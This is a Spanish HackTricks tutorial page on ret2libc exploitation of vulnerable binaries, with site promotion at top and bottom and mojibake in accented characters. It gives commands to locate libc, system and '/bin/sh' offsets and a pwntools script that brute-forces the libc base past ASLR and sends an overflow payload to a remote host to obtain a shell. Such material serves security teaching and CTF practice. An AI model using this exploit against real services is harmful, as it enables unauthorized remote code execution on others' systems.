Aprende a hackear AWS desde cero hasta convertirte en un experto con htARTE (HackTricks AWS Red Team Expert)! Otras formas de apoyar a HackTricks: * Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCI脫N**](https://github.com/sponsors/carlospolop)! * Obt茅n la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com) * Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colecci贸n exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **脷nete al** 馃挰 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **s铆guenos** en **Twitter** 馃惁 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.
**Si has encontrado un binario vulnerable y crees que puedes explotarlo usando Ret2Lib, aqu铆 puedes encontrar algunos pasos b谩sicos que puedes seguir.** # Si est谩s **dentro** del **host** ## Puedes encontrar la **direcci贸n de libc** ```bash ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ``` Si deseas verificar si ASLR est谩 cambiando la direcci贸n de libc, puedes hacer lo siguiente: ```bash for i in `seq 0 20`; do ldd | grep libc; done ``` ## Obtener el desplazamiento de la funci贸n system ```bash readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system ``` ## Obtener el desplazamiento de "/bin/sh" ```bash strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh ``` ## /proc/\/maps Si el proceso est谩 creando **hijos** cada vez que hablas con 茅l (servidor de red) intenta **leer** ese archivo (probablemente necesitar谩s ser root). Aqu铆 puedes encontrar **exactamente d贸nde se carga la libc** dentro del proceso y **d贸nde se cargar谩** para cada hijo del proceso. ![](<../../.gitbook/assets/image (95).png>) En este caso se carga en **0xb75dc000** (Esta ser谩 la direcci贸n base de la libc) ## Usando gdb-peda Obtener la direcci贸n de la funci贸n **system**, de la funci贸n **exit** y de la cadena **"/bin/sh"** usando gdb-peda: ``` p system p exit find "/bin/sh" ``` # Saltando ASLR Puedes intentar hacer fuerza bruta en la direcci贸n base de libc. ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` # C贸digo ```python from pwn import * c = remote('192.168.85.181',20002) c.recvline() #Banner for off in range(0xb7000000, 0xb8000000, 0x1000): p = "" p += p32(off + 0x0003cb20) #system p += "CCCC" #GARBAGE p += p32(off + 0x001388da) #/bin/sh payload = 'A'*0x20010 + p c.send(payload) c.interactive() #? ```
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)! Otras formas de apoyar a HackTricks: * Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCI脫N**](https://github.com/sponsors/carlospolop)! * Obt茅n el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com) * Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colecci贸n exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **脷nete al** 馃挰 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **s铆guenos** en **Twitter** 馃惁 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.